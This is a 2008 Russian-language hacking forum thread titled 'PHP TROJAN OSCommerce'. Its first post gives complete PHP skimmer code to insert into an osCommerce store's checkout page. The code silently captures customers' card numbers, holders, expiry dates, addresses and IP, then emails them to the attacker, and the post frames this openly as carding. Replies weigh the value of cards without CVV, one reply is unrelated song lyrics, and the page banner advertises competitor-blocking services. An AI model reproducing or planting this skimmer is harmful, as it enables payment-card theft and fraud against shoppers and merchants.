PHP TROJAN OSCommerce

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
PHP TROJAN OSCommerce

Опции темы

Поиск в этой теме

Опции просмотра

PHP TROJAN OSCommerce

02.11.2008, 20:10

vp$

Участник форума

Регистрация: 22.10.2007

Сообщений: 138

С нами: 9765139

Репутация: 177

PHP TROJAN OSCommerce

OSCommerce один из самых популярных движков для онлайн магазинов
в нем есть встоенный модуль для оплаты кредитными картами, который является лакомым куском для хакеров и кардеров
но все чаще встречаются всяческие способы защиты приватных данных, в случае исли злоумышленник все таки получил доступ к базе данных, то остался с носом, вот наглядный пример

номер карты закрыт в середине крестиками

именно для таких случаев я написал небольшой код, который будет перехватывать важную информацию

теперь имея доступ к файлам магазина, необходимо найти файл checkout_confirmation.php (он обычно находится в корневой папке шопа) и в ставить следующий код после открывающего тэга body:

PHP код:


		
			
<?

error_reporting (0);

$ip_holder = $_SERVER['REMOTE_ADDR'];

$tr_deliv_adr = tep_address_format($order->delivery['format_id'], $order->delivery, 1, ' ', ' ');

$tr_bill_adr = tep_address_format($order->billing['format_id'], $order->billing, 1, ' ', ' ');

$tr_cc_owner = $_POST["cc_owner"];

$tr_cc_number= $_POST["cc_number"];

$tr_cc_expires_month = $_POST["cc_expires_month"];

$tr_cc_expires_year= $_POST["cc_expires_year"];

$info_body = "Delivery Address: ";

$info_body .= $tr_deliv_adr."\n";

$info_body .= "----------------------------------\n";

$info_body .= "Billing Address: ";

$info_body .= $tr_bill_adr."\n";

$info_body .= "----------------------------------\n";

$info_body .= "IP holder: ".$ip_holder."\n";

$info_body .= "CC holder: ".$tr_cc_owner."\n";

$info_body .= "CC num: ".$tr_cc_number."\n";

$info_body .= "EXP: ".$tr_cc_expires_month."/".$tr_cc_expires_year."\n";

mail("your@mail.com",'!!! NEW CC !!!',$info_body,"onlineshop.com\r\n");

?>

теперь после каждой совершенной оплаты кредитной картой, на ваше мыло your@mail.com будет высылаться вся необходимая информация

P.S. данный код написан под модуль без использования CVV
P.P.S удачи в хеке

𝕏 Twitter Reddit Telegram Копировать ссылку

03.11.2008, 15:07

warlok

Постоянный

Регистрация: 18.02.2008

Сообщений: 368

С нами: 9594385

Репутация: 386

да токо сс без сvv сейчас неочень то актуальны =( надо переделать

03.11.2008, 15:14

satana8920

Постоянный

Регистрация: 22.09.2006

Сообщений: 531

С нами: 10333826

Репутация: 369

вот что я люблю =)

03.11.2008, 15:33

Gen1rus

Участник форума

Регистрация: 13.06.2007

Сообщений: 113

С нами: 9953844

Репутация: 526

Сосны фишками
Стол с картишками
Ветер тучки гнал
Шла гроза
Лихо встретили
Забраслетили
А я в мизер играл
Я ж в тузах.

Припев:
Да поздней осенью
Ой Дори-Дори
Небо с проседью
Ой Дори-Дори
Звезды сыпали
Ой Дори-Дори
Вечера
Да листопадами
Ой Дори-Дори
Бабки падали
Ой Дори-Дори
Было весело
Но вчера.

Форма сложная
Пыль дорожная
Приколоченный кабинет
Тундра с елками
Двор с метелками
И на проволоке
Птичек нет.

Припев

Дождь с крапивою
Небо сливою
Прётся радуга
Гриб подрос
Щечки гладкие
Ночки сладкие
В сердце сломанном
Лес унес.

Припев

Предыдущая тема Следующая тема

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Books PHP	FRAGNATIC	PHP	186	21.02.2010 02:41
Что такое Php?	PAPA212	Болталка	13	28.12.2007 20:44

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход